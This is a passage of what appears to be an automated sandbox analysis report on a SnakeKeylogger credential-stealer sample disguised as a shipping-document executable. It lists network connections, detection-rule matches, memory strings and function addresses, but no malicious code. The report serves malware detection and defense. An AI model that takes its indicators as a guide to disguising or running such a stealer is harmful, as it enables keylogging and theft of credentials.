              Source: PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000327A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.0000000003275000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002E45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49869 version: TLS 1.2

              System Summary

              barindex
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B86CA0_2_071B86CA
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B86E80_2_071B86E8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B93900_2_071B9390
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071BB0080_2_071BB008
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B8F580_2_071B8F58
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B8F480_2_071B8F48
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B8B110_2_071B8B11
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B8B200_2_071B8B20
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2D27810_2_02F2D278
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2537010_2_02F25370
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2A08810_2_02F2A088
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2C14710_2_02F2C147
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2711810_2_02F27118
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2C73810_2_02F2C738
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2C46810_2_02F2C468
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2CA0810_2_02F2CA08
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F269A010_2_02F269A0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2E98810_2_02F2E988
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2CFAB10_2_02F2CFAB
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2CCD810_2_02F2CCD8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F23A9910_2_02F23A99
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F229E010_2_02F229E0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2E97B10_2_02F2E97B
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F2F96110_2_02F2F961
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F23E0910_2_02F23E09
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F21FA810_2_06F21FA8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2944810_2_06F29448
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F29D3810_2_06F29D38
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F22A9010_2_06F22A90
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2185010_2_06F21850
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2514810_2_06F25148
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2D67010_2_06F2D670
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2D66010_2_06F2D660
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2966810_2_06F29668
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2E7D010_2_06F2E7D0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2E7C010_2_06F2E7C0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F21F9F10_2_06F21F9F
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2DF2010_2_06F2DF20
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2DF1110_2_06F2DF11
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F4D810_2_06F2F4D8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F28CC010_2_06F28CC0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F4C810_2_06F2F4C8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F28CB110_2_06F28CB1
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2EC2810_2_06F2EC28
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2EC1810_2_06F2EC18
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2CDC010_2_06F2CDC0
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2DAC810_2_06F2DAC8
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2DAB910_2_06F2DAB9
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2D21810_2_06F2D218
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2E37810_2_06F2E378
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2E36910_2_06F2E369
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F20B3010_2_06F20B30
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F20B2010_2_06F20B20
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F08010_2_06F2F080
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F07110_2_06F2F071
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2004010_2_06F20040
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2184110_2_06F21841
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2000610_2_06F20006
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F93010_2_06F2F930
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2513F10_2_06F2513F
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2F92110_2_06F2F921
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DF529412_2_02DF5294
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DFBCE812_2_02DFBCE8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DF47D812_2_02DF47D8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DF47D312_2_02DF47D3
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DF679112_2_02DF6791
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DF287412_2_02DF2874
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02DFBCD912_2_02DFBCD9
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02E1B5A012_2_02E1B5A0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02E1E52E12_2_02E1E52E
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02E19BA012_2_02E19BA0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_02E19B8F12_2_02E19B8F
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_070586D812_2_070586D8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_070586E812_2_070586E8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_0705939012_2_07059390
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_0705B00812_2_0705B008
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_07058F4812_2_07058F48
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_07058F5812_2_07058F58
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_07058B1112_2_07058B11
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_07058B2012_2_07058B20
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122711820_2_01227118
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122C14820_2_0122C148
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122537020_2_01225370
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122D27820_2_0122D278
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122C46820_2_0122C468
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122C73820_2_0122C738
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_012269B020_2_012269B0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122E98820_2_0122E988
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122CA0820_2_0122CA08
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_01229DE020_2_01229DE0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122CCD820_2_0122CCD8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122CFAB20_2_0122CFAB
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122F96120_2_0122F961
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122F97020_2_0122F970
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_0122E97B20_2_0122E97B
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_012239EE20_2_012239EE
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_012229EC20_2_012229EC
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_01223AA120_2_01223AA1
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_01223E1820_2_01223E18
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B1FA820_2_069B1FA8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B944820_2_069B9448
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B9D3820_2_069B9D38
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B2A9020_2_069B2A90
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B185020_2_069B1850
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B514820_2_069B5148
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BD67020_2_069BD670
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B966820_2_069B9668
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BD66020_2_069BD660
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B1FA220_2_069B1FA2
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BE7D020_2_069BE7D0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BE7C020_2_069BE7C0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BDF1F20_2_069BDF1F
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BDF1120_2_069BDF11
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BDF2020_2_069BDF20
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B8CB120_2_069B8CB1
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BF4D820_2_069BF4D8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B8CC020_2_069B8CC0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BEC1820_2_069BEC18
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BEC2820_2_069BEC28
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BCDAF20_2_069BCDAF
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BCDC020_2_069BCDC0
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BDAB920_2_069BDAB9
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BDAC820_2_069BDAC8
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BD21820_2_069BD218
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BD20920_2_069BD209
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B0B3020_2_069B0B30
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B0B2020_2_069B0B20
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BE37820_2_069BE378
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BE36A20_2_069BE36A
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BF08020_2_069BF080
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B000720_2_069B0007
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B184120_2_069B1841
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B004020_2_069B0040
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BF07120_2_069BF071
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069B513820_2_069B5138
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BF93020_2_069BF930
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 20_2_069BF92220_2_069BF922
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000000.1235297565.00000000009F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1284351587.000000000701E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1284899452.00000000070D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1280963333.0000000002D6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1277345689.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 00000000.00000002.1287956774.0000000008900000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3703377538.0000000001337000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3702417475.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exeBinary or memory string: OriginalFilenameHnGT.exe" vs MARCH SHIPMENT PLAN DOCS.exe
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
